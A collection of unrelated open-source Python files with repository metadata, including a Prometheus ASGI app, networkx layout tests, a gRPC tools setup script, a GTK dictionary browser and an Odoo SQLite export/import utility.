super(UnitsConfig, self).__init__(args, 'units')
self.collect_only = args.collect_only # type: bool
class CompileConfig(TestConfig):
"""Configuration for the compile command."""
def __init__(self, args):
"""
:type args: any
"""
super(CompileConfig, self).__init__(args, 'compile')
class Delegate(Exception):
"""Trigger command delegation."""
def __init__(self, exclude=None, require=None):
"""
:type exclude: list[str] | None
:type require: list[str] | None
"""
super(Delegate, self).__init__()
self.exclude = exclude or []
self.require = require or []
class AllTargetsSkipped(ApplicationWarning):
"""All targets skipped."""
def __init__(self):
super(AllTargetsSkipped, self).__init__('All targets skipped.')
SANITY_TESTS = (
# tests which ignore include/exclude (they're so fast it doesn't matter)
SanityFunc('code-smell', command_sanity_code_smell, intercept=False),
# tests which honor include/exclude
SanityFunc('shellcheck', command_sanity_shellcheck, intercept=False),
SanityFunc('pep8', command_sanity_pep8, intercept=False),
SanityFunc('yamllint', command_sanity_yamllint, intercept=False),
SanityFunc('validate-modules', command_sanity_validate_modules, intercept=False),
SanityFunc('ansible-doc', command_sanity_ansible_doc),
)
| gpl-3.0 |
sserrot/champion_relationships | venv/Lib/site-packages/prometheus_client/asgi.py | 2 | 1185 | from urllib.parse import parse_qs
from .exposition import _bake_output
from .registry import REGISTRY
def make_asgi_app(registry=REGISTRY):
"""Create a ASGI app which serves the metrics from a registry."""
async def prometheus_app(scope, receive, send):
assert scope.get("type") == "http"
# Prepare parameters
params = parse_qs(scope.get('query_string', b''))
accept_header = "Accept: " + ",".join([
value.decode("utf8") for (name, value) in scope.get('headers')
if name.decode("utf8") == 'accept'
])
# Bake output
status, header, output = _bake_output(registry, accept_header, params)
# Return output
payload = await receive()
if payload.get("type") == "http.request":
await send(
{
"type": "http.response.start",
"status": int(status.split(' ')[0]),
"headers": [
tuple(x.encode('utf8') for x in header)
]
}
)
await send({"type": "http.response.body", "body": output})
return prometheus_app
| mit |
velorientc/git_test7 | contrib/thgdebugtools/core.py | 1 | 2554 | # core.py - top-level menus and hooks
#
# Copyright 2013 Yuya Nishihara <yuya@tcha.org>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2, incorporated herein by reference.
import gc
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from tortoisehg.hgqt import run
import dbgutil, infobar, widgets
class DebugMenuActions(dbgutil.BaseMenuActions):
"""Set up top-level debug menu"""
def _setupMenu(self, menu):
if self._workbench():
m = menu.addMenu('&InfoBar')
infobar.InfoBarMenuActions(m, parent=self)
self._infoBarMenu = m
menu.aboutToShow.connect(self._updateInfoBarMenu)
m = menu.addMenu('&Widgets')
widgets.WidgetsMenuActions(m, parent=self)
menu.addSeparator()
a = menu.addAction('Run Full &Garbage Collection')
a.triggered.connect(self.runGc)
a = menu.addAction('') # placeholder to show gc status
a.setEnabled(False)
self._gcStatusAction = a
a = menu.addAction('&Enable Garbage Collector')
a.setCheckable(True)
a.triggered.connect(self.setGcEnabled)
self._gcEnabledAction = a
menu.aboutToShow.connect(self._updateGcAction)
@pyqtSlot()
def _updateInfoBarMenu(self):
self._infoBarMenu.setEnabled(bool(self._repoWidget()))
@pyqtSlot()
def runGc(self):
found = gc.collect()
self._information('GC Result', 'Found %d unreachable objects' % found)
@property
def _gcTimer(self):
return run.qtrun._gc.timer
def isGcEnabled(self):
return self._gcTimer.isActive()
@pyqtSlot(bool)
def setGcEnabled(self, enabled):
if enabled:
self._gcTimer.start()
else:
self._gcTimer.stop()
@pyqtSlot()
def _updateGcAction(self):
self._gcStatusAction.setText(' count = %s'
% ', '.join(map(str, gc.get_count())))
self._gcEnabledAction.setChecked(self.isGcEnabled())
def extsetup(ui):
class dbgqtrun(run.qtrun.__class__):
def _createdialog(self, dlgfunc, args, opts):
dlg, reporoot = super(dbgqtrun, self)._createdialog(dlgfunc, args,
opts)
if isinstance(dlg, QMainWindow):
m = dlg.menuBar().addMenu('&Debug')
DebugMenuActions(m, parent=dlg)
return dlg, reporoot
run.qtrun.__class__ = dbgqtrun
| gpl-2.0 |
jni/networkx | networkx/drawing/tests/test_layout.py | 43 | 1870 | """Unit tests for layout functions."""
import sys
from nose import SkipTest
from nose.tools import assert_equal
import networkx as nx
class TestLayout(object):
numpy=1 # nosetests attribute, use nosetests -a 'not numpy' to skip test
@classmethod
def setupClass(cls):
global numpy
try:
import numpy
except ImportError:
raise SkipTest('numpy not available.')
def setUp(self):
self.Gi=nx.grid_2d_graph(5,5)
self.Gs=nx.Graph()
self.Gs.add_path('abcdef')
self.bigG=nx.grid_2d_graph(25,25) #bigger than 500 nodes for sparse
def test_smoke_int(self):
G=self.Gi
vpos=nx.random_layout(G)
vpos=nx.circular_layout(G)
vpos=nx.spring_layout(G)
vpos=nx.fruchterman_reingold_layout(G)
vpos=nx.spectral_layout(G)
vpos=nx.spectral_layout(self.bigG)
vpos=nx.shell_layout(G)
def test_smoke_string(self):
G=self.Gs
vpos=nx.random_layout(G)
vpos=nx.circular_layout(G)
vpos=nx.spring_layout(G)
vpos=nx.fruchterman_reingold_layout(G)
vpos=nx.spectral_layout(G)
vpos=nx.shell_layout(G)
def test_adjacency_interface_numpy(self):
A=nx.to_numpy_matrix(self.Gs)
pos=nx.drawing.layout._fruchterman_reingold(A)
pos=nx.drawing.layout._fruchterman_reingold(A,dim=3)
assert_equal(pos.shape,(6,3))
def test_adjacency_interface_scipy(self):
try:
import scipy
except ImportError:
raise SkipTest('scipy not available.')
A=nx.to_scipy_sparse_matrix(self.Gs,dtype='d')
pos=nx.drawing.layout._sparse_fruchterman_reingold(A)
pos=nx.drawing.layout._sparse_spectral(A)
pos=nx.drawing.layout._sparse_fruchterman_reingold(A,dim=3)
assert_equal(pos.shape,(6,3))
| bsd-3-clause |
pmarks-net/grpc | tools/distrib/python/grpcio_tools/setup.py | 9 | 7849 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils import cygwinccompiler
from distutils import extension
from distutils import util
import errno
import os
import os.path
import pkg_resources
import platform
import re
import shlex
import shutil
import sys
import sysconfig
import setuptools
from setuptools.command import build_ext
# TODO(atash) add flag to disable Cython use
os.chdir(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.abspath('.'))
import protoc_lib_deps
import grpc_version
PY3 = sys.version_info.major == 3
# Environment variable to determine whether or not the Cython extension should
# *use* Cython or use the generated C files. Note that this requires the C files
# to have been generated by building first *with* Cython support.
BUILD_WITH_CYTHON = os.environ.get('GRPC_PYTHON_BUILD_WITH_CYTHON', False)
# There are some situations (like on Windows) where CC, CFLAGS, and LDFLAGS are
# entirely ignored/dropped/forgotten by distutils and its Cygwin/MinGW support.
# We use these environment variables to thus get around that without locking
# ourselves in w.r.t. the multitude of operating systems this ought to build on.
# We can also use these variables as a way to inject environment-specific
# compiler/linker flags. We assume GCC-like compilers and/or MinGW as a
# reasonable default.
EXTRA_ENV_COMPILE_ARGS = os.environ.get('GRPC_PYTHON_CFLAGS', None)
EXTRA_ENV_LINK_ARGS = os.environ.get('GRPC_PYTHON_LDFLAGS', None)
if EXTRA_ENV_COMPILE_ARGS is None:
EXTRA_ENV_COMPILE_ARGS = '-std=c++11'
if 'win32' in sys.platform:
if sys.version_info < (3, 5):
# We use define flags here and don't directly add to DEFINE_MACROS below to
# ensure that the expert user/builder has a way of turning it off (via the
# envvars) without adding yet more GRPC-specific envvars.
# See https://sourceforge.net/p/mingw-w64/bugs/363/
if '32' in platform.architecture()[0]:
EXTRA_ENV_COMPILE_ARGS += ' -D_ftime=_ftime32 -D_timeb=__timeb32 -D_ftime_s=_ftime32_s'
else:
EXTRA_ENV_COMPILE_ARGS += ' -D_ftime=_ftime64 -D_timeb=__timeb64'
else:
# We need to statically link the C++ Runtime, only the C runtime is
# available dynamically
EXTRA_ENV_COMPILE_ARGS += ' /MT'
elif "linux" in sys.platform or "darwin" in sys.platform:
EXTRA_ENV_COMPILE_ARGS += ' -fno-wrapv -frtti'
if EXTRA_ENV_LINK_ARGS is None:
EXTRA_ENV_LINK_ARGS = ''
if "linux" in sys.platform or "darwin" in sys.platform:
EXTRA_ENV_LINK_ARGS += ' -lpthread'
elif "win32" in sys.platform and sys.version_info < (3, 5):
msvcr = cygwinccompiler.get_msvcr()[0]
# TODO(atash) sift through the GCC specs to see if libstdc++ can have any
# influence on the linkage outcome on MinGW for non-C++ programs.
EXTRA_ENV_LINK_ARGS += (
' -static-libgcc -static-libstdc++ -mcrtdll={msvcr} '
'-static'.format(msvcr=msvcr))
EXTRA_COMPILE_ARGS = shlex.split(EXTRA_ENV_COMPILE_ARGS)
EXTRA_LINK_ARGS = shlex.split(EXTRA_ENV_LINK_ARGS)
CC_FILES = [
os.path.normpath(cc_file) for cc_file in protoc_lib_deps.CC_FILES]
PROTO_FILES = [
os.path.normpath(proto_file) for proto_file in protoc_lib_deps.PROTO_FILES]
CC_INCLUDE = os.path.normpath(protoc_lib_deps.CC_INCLUDE)
PROTO_INCLUDE = os.path.normpath(protoc_lib_deps.PROTO_INCLUDE)
GRPC_PYTHON_TOOLS_PACKAGE = 'grpc_tools'
GRPC_PYTHON_PROTO_RESOURCES_NAME = '_proto'
DEFINE_MACROS = ()
if "win32" in sys.platform:
DEFINE_MACROS += (('WIN32_LEAN_AND_MEAN', 1),)
if '64bit' in platform.architecture()[0]:
DEFINE_MACROS += (('MS_WIN64', 1),)
elif "linux" in sys.platform or "darwin" in sys.platform:
DEFINE_MACROS += (('HAVE_PTHREAD', 1),)
# By default, Python3 distutils enforces compatibility of
# c plugins (.so files) with the OSX version Python3 was built with.
# For Python3.4, this is OSX 10.6, but we need Thread Local Support (__thread)
if 'darwin' in sys.platform and PY3:
mac_target = sysconfig.get_config_var('MACOSX_DEPLOYMENT_TARGET')
if mac_target and (pkg_resources.parse_version(mac_target) <
pkg_resources.parse_version('10.9.0')):
os.environ['MACOSX_DEPLOYMENT_TARGET'] = '10.9'
os.environ['_PYTHON_HOST_PLATFORM'] = re.sub(
r'macosx-[0-9]+\.[0-9]+-(.+)',
r'macosx-10.9-\1',
util.get_platform())
def package_data():
tools_path = GRPC_PYTHON_TOOLS_PACKAGE.replace('.', os.path.sep)
proto_resources_path = os.path.join(tools_path,
GRPC_PYTHON_PROTO_RESOURCES_NAME)
proto_files = []
for proto_file in PROTO_FILES:
source = os.path.join(PROTO_INCLUDE, proto_file)
target = os.path.join(proto_resources_path, proto_file)
relative_target = os.path.join(GRPC_PYTHON_PROTO_RESOURCES_NAME, proto_file)
try:
os.makedirs(os.path.dirname(target))
except OSError as error:
if error.errno == errno.EEXIST:
pass
else:
raise
shutil.copy(source, target)
proto_files.append(relative_target)
return {GRPC_PYTHON_TOOLS_PACKAGE: proto_files}
def extension_modules():
if BUILD_WITH_CYTHON:
plugin_sources = [os.path.join('grpc_tools', '_protoc_compiler.pyx')]
else:
plugin_sources = [os.path.join('grpc_tools', '_protoc_compiler.cpp')]
plugin_sources += [
os.path.join('grpc_tools', 'main.cc'),
os.path.join('grpc_root', 'src', 'compiler', 'python_generator.cc')] + [
os.path.join(CC_INCLUDE, cc_file)
for cc_file in CC_FILES]
plugin_ext = extension.Extension(
name='grpc_tools._protoc_compiler',
sources=plugin_sources,
include_dirs=[
'.',
'grpc_root',
os.path.join('grpc_root', 'include'),
CC_INCLUDE,
],
language='c++',
define_macros=list(DEFINE_MACROS),
extra_compile_args=list(EXTRA_COMPILE_ARGS),
extra_link_args=list(EXTRA_LINK_ARGS),
)
extensions = [plugin_ext]
if BUILD_WITH_CYTHON:
from Cython import Build
return Build.cythonize(extensions)
else:
return extensions
setuptools.setup(
name='grpcio-tools',
version=grpc_version.VERSION,
license='3-clause BSD',
ext_modules=extension_modules(),
packages=setuptools.find_packages('.'),
install_requires=[
'protobuf>=3.0.0',
'grpcio>={version}'.format(version=grpc_version.VERSION),
],
package_data=package_data(),
)
| bsd-3-clause |
wkritzinger/asuswrt-merlin | release/src/router/samba3/source/python/gtkdictbrowser.py | 55 | 7283 | #!/usr/bin/python
#
# Browse a Python dictionary in a two pane graphical interface written
# in GTK.
#
# The GtkDictBrowser class is supposed to be generic enough to allow
# applications to override enough methods and produce a
# domain-specific browser provided the information is presented as a
# Python dictionary.
#
# Possible applications:
#
# - Windows registry browser
# - SPOOLSS printerdata browser
# - tdb file browser
#
from gtk import *
import string, re
class GtkDictBrowser:
def __init__(self, dict):
self.dict = dict
# This variable stores a list of (regexp, function) used to
# convert the raw value data to a displayable string.
self.get_value_text_fns = []
self.get_key_text = lambda x: x
# We can filter the list of keys displayed using a regex
self.filter_regex = ""
# Create and configure user interface widgets. A string argument is
# used to set the window title.
def build_ui(self, title):
win = GtkWindow()
win.set_title(title)
win.connect("destroy", mainquit)
hpaned = GtkHPaned()
win.add(hpaned)
hpaned.set_border_width(5)
hpaned.show()
vbox = GtkVBox()
hpaned.add1(vbox)
vbox.show()
scrolled_win = GtkScrolledWindow()
scrolled_win.set_policy(POLICY_AUTOMATIC, POLICY_AUTOMATIC)
vbox.pack_start(scrolled_win)
scrolled_win.show()
hbox = GtkHBox()
vbox.pack_end(hbox, expand = 0, padding = 5)
hbox.show()
label = GtkLabel("Filter:")
hbox.pack_start(label, expand = 0, padding = 5)
label.show()
self.entry = GtkEntry()
hbox.pack_end(self.entry, padding = 5)
self.entry.show()
self.entry.connect("activate", self.filter_activated)
self.list = GtkList()
self.list.set_selection_mode(SELECTION_MULTIPLE)
self.list.set_selection_mode(SELECTION_BROWSE)
scrolled_win.add_with_viewport(self.list)
self.list.show()
self.list.connect("select_child", self.key_selected)
scrolled_win = GtkScrolledWindow()
scrolled_win.set_policy(POLICY_AUTOMATIC, POLICY_AUTOMATIC)
hpaned.add2(scrolled_win)
scrolled_win.set_usize(500,400)
scrolled_win.show()
self.text = GtkText()
self.text.set_editable(FALSE)
scrolled_win.add_with_viewport(self.text)
self.text.show()
self.text.connect("event", self.event_handler)
self.menu = GtkMenu()
self.menu.show()
self.font = load_font("fixed")
self.update_keylist()
win.show()
# Add a key to the left hand side of the user interface
def add_key(self, key):
display_key = self.get_key_text(key)
list_item = GtkListItem(display_key)
list_item.set_data("raw_key", key) # Store raw key in item data
self.list.add(list_item)
list_item.show()
# Event handler registered by build_ui()
def event_handler(self, event, menu):
return FALSE
# Set the text to appear in the right hand side of the user interface
def set_value_text(self, item):
# Clear old old value in text window
self.text.delete_text(0, self.text.get_length())
if type(item) == str:
# The text widget has trouble inserting text containing NULL
# characters.
item = string.replace(item, "\x00", ".")
self.text.insert(self.font, None, None, item)
else:
# A non-text item
self.text.insert(self.font, None, None, repr(item))
# This function is called when a key is selected in the left hand side
# of the user interface.
def key_selected(self, list, list_item):
key = list_item.children()[0].get()
# Look for a match in the value display function list
text = self.dict[list_item.get_data("raw_key")]
for entry in self.get_value_text_fns:
if re.match(entry[0], key):
text = entry[1](text)
break
self.set_value_text(text)
# Refresh the key list by removing all items and re-inserting them.
# Items are only inserted if they pass through the filter regexp.
def update_keylist(self):
self.list.remove_items(self.list.children())
self.set_value_text("")
for k in self.dict.keys():
if re.match(self.filter_regex, k):
self.add_key(k)
# Invoked when the user hits return in the filter text entry widget.
def filter_activated(self, entry):
self.filter_regex = entry.get_text()
self.update_keylist()
# Register a key display function
def register_get_key_text_fn(self, fn):
self.get_key_text = fn
# Register a value display function
def register_get_value_text_fn(self, regexp, fn):
self.get_value_text_fns.append((regexp, fn))
#
# A utility function to convert a string to the standard hex + ascii format.
# To display all values in hex do:
# register_get_value_text_fn("", gtkdictbrowser.hex_string)
#
def hex_string(data):
"""Return a hex dump of a string as a string.
The output produced is in the standard 16 characters per line hex +
ascii format:
00000000: 40 00 00 00 00 00 00 00 40 00 00 00 01 00 04 80 @....... @.......
00000010: 01 01 00 00 00 00 00 01 00 00 00 00 ........ ....
"""
pos = 0 # Position in data
line = 0 # Line of data
hex = "" # Hex display
ascii = "" # ASCII display
result = ""
while pos < len(data):
# Start with header
if pos % 16 == 0:
hex = "%08x: " % (line * 16)
ascii = ""
# Add character
hex = hex + "%02x " % (ord(data[pos]))
if ord(data[pos]) < 32 or ord(data[pos]) > 176:
ascii = ascii + '.'
else:
ascii = ascii + data[pos]
pos = pos + 1
# Add separator if half way
if pos % 16 == 8:
hex = hex + " "
ascii = ascii + " "
# End of line
if pos % 16 == 0:
result = result + "%s %s\n" % (hex, ascii)
line = line + 1
# Leftover bits
if pos % 16 != 0:
# Pad hex string
for i in range(0, (16 - (pos % 16))):
hex = hex + " "
# Half way separator
if (pos % 16) < 8:
hex = hex + " "
result = result + "%s %s\n" % (hex, ascii)
return result
# For testing purposes, create a fixed dictionary to browse with
if __name__ == "__main__":
dict = {"chicken": "ham", "spam": "fun", "subdict": {"a": "b", "c": "d"}}
db = GtkDictBrowser(dict)
db.build_ui("GtkDictBrowser")
# Override Python's handling of ctrl-c so we can break out of the
# gui from the command line.
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
mainloop()
| gpl-2.0 |
dut3062796s/PTVS | Python/Tests/TestData/VirtualEnv/env/Lib/encodings/big5hkscs.py | 61 | 1078 | #
# big5hkscs.py: Python Unicode Codec for BIG5HKSCS
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_hk, codecs
import _multibytecodec as mbc
codec = _codecs_hk.getcodec('big5hkscs')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='big5hkscs',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| apache-2.0 |
marscher/PyEMMA | pyemma/util/annotators.py | 1 | 8097 |
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import warnings
from decorator import decorator, decorate
from inspect import stack
from pyemma.util.exceptions import PyEMMA_DeprecationWarning
__all__ = ['alias',
'aliased',
'deprecated',
'shortcut',
'fix_docs',
]
def fix_docs(cls):
""" copies docstrings of derived attributes (methods, properties, attrs) from parent classes."""
import inspect
public_undocumented_members = {name: func for name, func in inspect.getmembers(cls)
if not name.startswith('_') and func.__doc__ is None}
for name, func in public_undocumented_members.items():
for parent in cls.__mro__[1:]:
parfunc = getattr(parent, name, None)
if parfunc and getattr(parfunc, '__doc__', None):
if isinstance(func, property):
# copy property, since its doc attribute is read-only
new_prop = property(fget=func.fget, fset=func.fset,
fdel=func.fdel, doc=parfunc.__doc__)
setattr(cls, name, new_prop)
else:
if hasattr(func, '__func__'): # handle instancemethods
func.__func__.__doc__ = parfunc.__doc__
else:
func.__doc__ = parfunc.__doc__
break
return cls
class alias(object):
"""
Alias class that can be used as a decorator for making methods callable
through other names (or "aliases").
Note: This decorator must be used inside an @aliased -decorated class.
For example, if you want to make the method shout() be also callable as
yell() and scream(), you can use alias like this:
@alias('yell', 'scream')
def shout(message):
# ....
"""
def __init__(self, *aliases):
"""Constructor."""
self.aliases = set(aliases)
def __call__(self, f):
"""
Method call wrapper. As this decorator has arguments, this method will
only be called once as a part of the decoration process, receiving only
one argument: the decorated function ('f'). As a result of this kind of
decorator, this method must return the callable that will wrap the
decorated function.
"""
if isinstance(f, property):
f.fget._aliases = self.aliases
else:
f._aliases = self.aliases
return f
def aliased(aliased_class):
"""
Decorator function that *must* be used in combination with @alias
decorator. This class will make the magic happen!
@aliased classes will have their aliased method (via @alias) actually
aliased.
This method simply iterates over the member attributes of 'aliased_class'
seeking for those which have an '_aliases' attribute and then defines new
members in the class using those aliases as mere pointer functions to the
original ones.
Usage:
>>> @aliased
... class MyClass(object):
... @alias('coolMethod', 'myKinkyMethod')
... def boring_method(self):
... pass
...
... @property
... @alias('my_prop_alias')
... def my_prop(self):
... return "hi"
>>> i = MyClass()
>>> i.coolMethod() # equivalent to i.myKinkyMethod() and i.boring_method()
>>> i.my_prop == i.my_prop_alias
True
"""
original_methods = aliased_class.__dict__.copy()
original_methods_set = set(original_methods)
for name, method in original_methods.items():
aliases = None
if isinstance(method, property) and hasattr(method.fget, '_aliases'):
aliases = method.fget._aliases
elif hasattr(method, '_aliases'):
aliases = method._aliases
if aliases:
# Add the aliases for 'method', but don't override any
# previously-defined attribute of 'aliased_class'
for alias in aliases - original_methods_set:
setattr(aliased_class, alias, method)
return aliased_class
def shortcut(*names):
"""Add an shortcut (alias) to a decorated function, but not to class methods!
Use aliased/alias decorators for class members!
Calling the shortcut (alias) will call the decorated function. The shortcut name will be appended
to the module's __all__ variable and the shortcut function will inherit the function's docstring
Examples
--------
In some module you have defined a function
>>> @shortcut('is_tmatrix') # doctest: +SKIP
>>> def is_transition_matrix(args): # doctest: +SKIP
... pass # doctest: +SKIP
Now you are able to call the function under its short name
>>> is_tmatrix(args) # doctest: +SKIP
"""
def wrap(f):
globals_ = f.__globals__
for name in names:
globals_[name] = f
if '__all__' in globals_ and name not in globals_['__all__']:
globals_['__all__'].append(name)
return f
return wrap
def get_culprit(omit_top_frames=1):
"""get the filename and line number calling this.
Parameters
----------
omit_top_frames: int, default=1
omit n frames from top of stack stack. Purpose is to get the real
culprit and not intermediate functions on the stack.
Returns
-------
(filename: str, fileno: int)
filename and line number of the culprit.
"""
try:
caller_stack = stack()[omit_top_frames:]
while len(caller_stack) > 0:
frame = caller_stack.pop(0)
filename = frame[1]
# skip callee frames if they are other decorators or this file(func)
if '<decorator' in filename or __file__ in filename:
continue
else:
break
lineno = frame[2]
# avoid cyclic references!
del caller_stack, frame
except OSError: # eg. os.getcwd() fails in conda-test, since cwd gets deleted.
filename = 'unknown'
lineno = -1
return filename, lineno
def deprecated(*optional_message):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used.
Parameters
----------
*optional_message : str
an optional user level hint which should indicate which feature to use otherwise.
"""
def _deprecated(func, *args, **kw):
filename, lineno = get_culprit()
user_msg = 'Call to deprecated function "%s". Called from %s line %i. %s' \
% (func.__name__, filename, lineno, msg)
warnings.warn_explicit(
user_msg,
category=PyEMMA_DeprecationWarning,
filename=filename,
lineno=lineno
)
return func(*args, **kw)
# add deprecation notice to func docstring:
if len(optional_message) == 1 and callable(optional_message[0]):
# this is the function itself, decorate!
msg = ""
return decorate(optional_message[0], _deprecated)
else:
# actually got a message (or empty parenthesis)
msg = optional_message[0] if len(optional_message) > 0 else ""
return decorator(_deprecated)
| lgpl-3.0 |
CLVsol/clvsol_odoo_api | hr_department_history.py | 1 | 7317 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import print_function
import sqlite3
def hr_department_history_export_sqlite_10(client, args, db_path, table_name):
conn = sqlite3.connect(db_path)
conn.text_factory = str
cursor = conn.cursor()
try:
cursor.execute('''DROP TABLE ''' + table_name + ''';''')
except Exception as e:
print('------->', e)
cursor.execute(
'''
CREATE TABLE ''' + table_name + ''' (
id INTEGER NOT NULL PRIMARY KEY,
employee_id,
department_id,
sign_in_date,
sign_out_date,
history_marker_id,
notes,
active,
new_id INTEGER
);
'''
)
# client.context = {'active_test': False}
department_history_model = client.model('hr.department.history')
department_history_browse = department_history_model.browse(args)
department_history_count = 0
for department_history_reg in department_history_browse:
department_history_count += 1
print(department_history_count, department_history_reg.id,
department_history_reg.department_id.name.encode("utf-8"))
employee_id = None
if department_history_reg.employee_id:
employee_id = department_history_reg.employee_id.id
department_id = None
if department_history_reg.department_id:
department_id = department_history_reg.department_id.id
sign_in_date = None
if department_history_reg.sign_in_date:
sign_in_date = department_history_reg.sign_in_date
sign_out_date = None
if department_history_reg.sign_out_date:
sign_out_date = department_history_reg.sign_out_date
history_marker_id = None
if department_history_reg.history_marker_id:
history_marker_id = department_history_reg.history_marker_id.id
notes = None
if department_history_reg.notes:
notes = department_history_reg.notes
cursor.execute('''
INSERT INTO ''' + table_name + '''(
id,
employee_id,
department_id,
sign_in_date,
sign_out_date,
history_marker_id,
notes,
active
)
VALUES(?,?,?,?,?,?,?,?)
''', (department_history_reg.id,
employee_id,
department_id,
sign_in_date,
sign_out_date,
history_marker_id,
notes,
department_history_reg.active,
)
)
conn.commit()
conn.close()
print()
print('--> department_history_count: ', department_history_count)
def hr_department_history_import_sqlite_10(
client, args, db_path, table_name,
hr_employee_table_name, hr_department_table_name, history_marker_table_name
):
department_history_model = client.model('hr.department.history')
history_marker_model = client.model('clv.history_marker')
hr_employee_model = client.model('hr.employee')
hr_department_model = client.model('hr.department')
conn = sqlite3.connect(db_path)
conn.row_factory = sqlite3.Row
cursor = conn.cursor()
cursor2 = conn.cursor()
department_history_count = 0
data = cursor.execute(
'''
SELECT
id,
employee_id,
department_id,
sign_in_date,
sign_out_date,
history_marker_id,
notes,
active,
new_id
FROM ''' + table_name + ''';
'''
)
print(data)
print([field[0] for field in cursor.description])
for row in cursor:
department_history_count += 1
print(department_history_count, row['id'], row['department_id'])
new_history_marker_id = False
cursor2.execute(
'''
SELECT name
FROM ''' + history_marker_table_name + '''
WHERE id = ?;''',
(row['history_marker_id'],
)
)
history_marker_name = cursor2.fetchone()[0]
history_marker_browse = history_marker_model.browse([('name', '=', history_marker_name), ])
new_history_marker_id = history_marker_browse.id[0]
employee_id = False
cursor2.execute(
'''
SELECT name
FROM ''' + hr_employee_table_name + '''
WHERE id = ?;''',
(row['employee_id'],
)
)
employee_name = cursor2.fetchone()
if employee_name is not None:
employee_name = employee_name[0]
hr_employee_browse = hr_employee_model.browse([('name', '=', employee_name), ])
employee_id = hr_employee_browse.id[0]
department_id = False
cursor2.execute(
'''
SELECT name
FROM ''' + hr_department_table_name + '''
WHERE id = ?;''',
(row['department_id'],
)
)
department_name = cursor2.fetchone()
if department_name is not None:
department_name = department_name[0]
hr_department_browse = hr_department_model.browse([('name', '=', department_name), ])
department_id = hr_department_browse.id[0]
values = {
'employee_id': employee_id,
'department_id': department_id,
'sign_in_date': row['sign_in_date'],
'sign_out_date': row['sign_out_date'],
'history_marker_id': new_history_marker_id,
'notes': row['notes'],
'active': row['active'],
}
department_history_id = department_history_model.create(values).id
cursor2.execute(
'''
UPDATE ''' + table_name + '''
SET new_id = ?
WHERE id = ?;''',
(department_history_id,
row['id']
)
)
conn.commit()
conn.close()
print()
print('--> department_history_count: ', department_history_count)
| agpl-3.0 |
davidsminor/cortex | test/IECore/BoolVectorData.py | 12 | 2875 | ##########################################################################
#
# Copyright (c) 2007-2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
